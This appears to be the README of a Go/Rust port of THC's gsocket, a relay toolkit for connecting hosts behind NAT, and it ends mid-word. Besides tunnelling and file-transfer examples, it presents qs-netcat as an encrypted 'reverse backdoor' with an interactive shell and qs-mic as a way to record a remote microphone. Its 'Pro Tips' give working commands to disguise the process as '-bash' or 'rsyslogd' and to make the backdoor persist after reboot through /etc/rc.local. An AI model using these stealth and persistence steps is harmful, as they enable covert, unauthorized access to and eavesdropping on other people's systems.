Quantum Socket Toolkit

<div align="center"> <img src=".github/img/banner.png"> <br> <br>

</div>

The Quantum Socket Toolkit allows two system behind NAT/Firewall to establish a TCP/TLS connection with each other.

The qsocket library locally derives a universally unique identifier (UUID) and connects two devices through the Quantum Socket Relay Network (QSRN) regardless and independent of the network layers, local IP Address or geographical location. The entire qsocket project is ported from the original gsocket toolkit of THC.

But Why?

So why did you reinvent the wheel? Simply because we wanted our own wheel :) Due to several design choices of THC and the nature of the project we were not comfortable using the GSRN for our own business. So we decided to create our own version to our own liking. We also wanted to modernize the project by porting it to Go/Rust, add new features, more platform support, and scalability.

<div align="center"> <img src=".github/img/gorust.jpg"> </div>

The Quantum Socket Toolkit comes with a set of tools:

• qs-netcat - Netcat on steroids. Turn netcat into an TLS encrypted reverse backdoor via TOR (optional) with a true PTY/interactive command shell (qs-netcat -s MySecret -i), integrated file-transfer, redirect traffic or give somebody temporary shell access.
• qs-mic - Access (record audio) the microphone devices of a remote system. (qs-mic -s MySecret -d 10)
• qs-proxy - Redirects the traffic of an existing program (binary) over the QSRN. It does so by hooking fundamental socket libraries inside libc using LD_PRELOAD method. (Experimental)
• ...many more examples and tools.
• qs-lite - Lightweight version of qs-netcat utility written in pure Rust (no external dependency).

Installation

| Tool | Build From Source | Binary Release | | :-----------: | :----------------------------------------------------------: | :-------------------------------------------------------: | | qs-netcat | go install github.com/qsocket/qs-netcat@master | Download | | qs-mic | cargo install --git https://github.com/qsocket/qs-mic | Download | | qs-lite | cargo install --git https://github.com/qsocket/qs-lite | Download | | qs-proxy | make && make install | Download |

Docker Install

docker pull qsocket/qs-netcat
docker run -it qsocket/qs-netcat -h

Supported Platforms

Qsocket toolkit supports 12 platforms on 11 architecture, check Supported Platforms below for detailed table.

<details> <summary>Supported Platforms</summary>

| Tool | Linux | Windows | Darwin | FreeBSD | OpenBSD | NetBSD | Android | IOS | Solaris | Illumos | Dragonfly | AIX | | :-----------: | :-------: | :---------: | ---------- | ----------- | ----------- | ---------- | ----------- | ------- | ----------- | ----------- | ------------- | ------- | | qs-netcat | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | | qs-lite | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | | qs-mic | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ | ❌ | | qs-proxy | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ | ❌ | | ~qs-cam~ | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |

</details>

---

Examples

https://user-images.githubusercontent.com/17179401/224060762-e0f121f6-431b-4eb5-8833-4a5d533003de.mp4

<details> <summary>RDP connection over QSRN</summary>

https://user-images.githubusercontent.com/17179401/213314447-65ecaf43-89fd-48bd-a242-3345f6baf185.mov

</details> <details> <summary>ADB access over QSRN</summary>

https://user-images.githubusercontent.com/17179401/216651601-6ddc8ddf-7248-4c2b-bd77-00f00f773c80.mov

</details>

Usage:

• SSH from Workstation B to Workstation A through any firewall/NAT

$ qs-netcat -f "localhost:22" -l  # Workstation A
$ qs-proxy ssh root@qsocket        # Workstation B

• Log in to Workstation A from Workstation B through any firewall/NAT

$ qs-netcat -l -i   # Workstation A
$ qs-netcat -i      # Workstation B

• Transfer files from Workstation B to Workstation A

$ qs-netcat -q -s MySecret -l > file.txt     # Workstation A
$ qs-netcat -q -s MySecret < file.txt        # Workstation B

• Port forward. Access 192.168.6.7:22 on Workstation's A private LAN from Workstation B:

$ qs-netcat -l -f 192.168.6.7:22    # Workstation A
$ qs-netcat -f :2222                # Workstation B

• In a new terminal on Workstation B execute:

ssh -p 2222 root@127.0.0.1        # Will ssh to 192.168.6.7:22 on Workstation's A private LAN

• Execute any command (nc -e style) on Workstation A

$ qs-netcat -l -e "echo hello world; id; exit"   # Workstation A
$ qs-netcat                                      # Workstation B

Another example: Spawn a new docker environment deep inside a private network

# Start this on a host deep inside a private network
qs-netcat -il -e "docker run --rm -it kalilinux/kali-rolling"

Access the docker environment deep inside the private network from anywhere in the world:

qs-netcat -i

Listen in on a remote computer microphone for 10 seconds

$ qs-mic -l -s MySecret           # Workstation A
$ qs-mic -d 10 -s MySecret --play # Workstation B

Access entirety of Workstation A's private LAN (Sock4/4a/5 proxy)

$ qs-netcat -l -f :22 -s MySecret                                        # Workstation A
$ ssh -D 9090 -o ProxyCommand='qs-netcat -s MySecret' root@doesnotmatter # Workstation B

Access www.google.com via Workstation A's private LAN from your Workstation B:
$ curl --socks4a 127.1:9090 http://www.google.com

Mount a remote folder using sshfs and qs-netcat

$ qs-netcat -l -f :22 -s MySecret # Workstation A
$ qs-netcat -f :9090 -s MySecret  # Workstation B
$ sudo sshfs -o allow_other,default_permissions -p 9090 root@localhost:/remote_dir /mnt/local_dir # Workstation B

Pro Tips

• Hide your arguments (argv)

Pass the arguments by environment variable (QS_ARGS) and use a bash-trick to hide qs-netcat binary in the process list:

$ export QS_ARGS="-s MySecret -l -i -q"
$ exec -a -bash ./qs-netcat &     # Hide as '-bash'.
$ ps alxww | grep qs-netcat

$ ps alxww | grep -bash
  1001 47255     1   0  26  5  4281168    436 -      SNs    ??    0:00.00 -bash

• SSH login to remote workstation

# On the remote workstation execute:
qs-netcat -s MySecret -l -f 192.168.6.7:22

or

# Access 192.168.6.7 via ssh on the remote network from your workstation:
ssh -o ProxyCommand='qs-netcat -q -s MySecret' root@doesnotmatter

• Retain access after reboot The easiest way to retain access to a remote system is by using the automated deploy script. Alternatively the following can be used to achieve the same: Combine what you have learned so far and make your backdoor restart after reboot (and as a hidden service obfuscated as rsyslogd). Use any of the start-up scripts, such as /etc/rc.local:

$ cat /etc/rc.local
#! /bin/sh -e

QS_ARGS="-s MySecret -l -i -q" HOME=/root TERM=xterm-256color SHELL="/bin/bash" /bin/bash -c "cd $HOME; exec -a rsyslogd /usr/local/bin/qs-netcat"

exit 0

Not all environment variables are set during system bootup. Set some variables to make the backdoor more enjoyable: TERM=xterm-256color and SHELL=/bin/bash and HOME=/root. The startup script (/etc/rc.local) uses /bin/sh which does not support our exec -a trick. Thus we use /bin/sh to start /bin/bash which in turn does the exec -a trick and starts qs-netcat. Puh. The qs-netcat process is hidden (as rsyslogd) from the process list. Read how to enable rc.local if /etc/rc.local does not exist.

Alternatively install qs-netcat as a systemd service.

Alter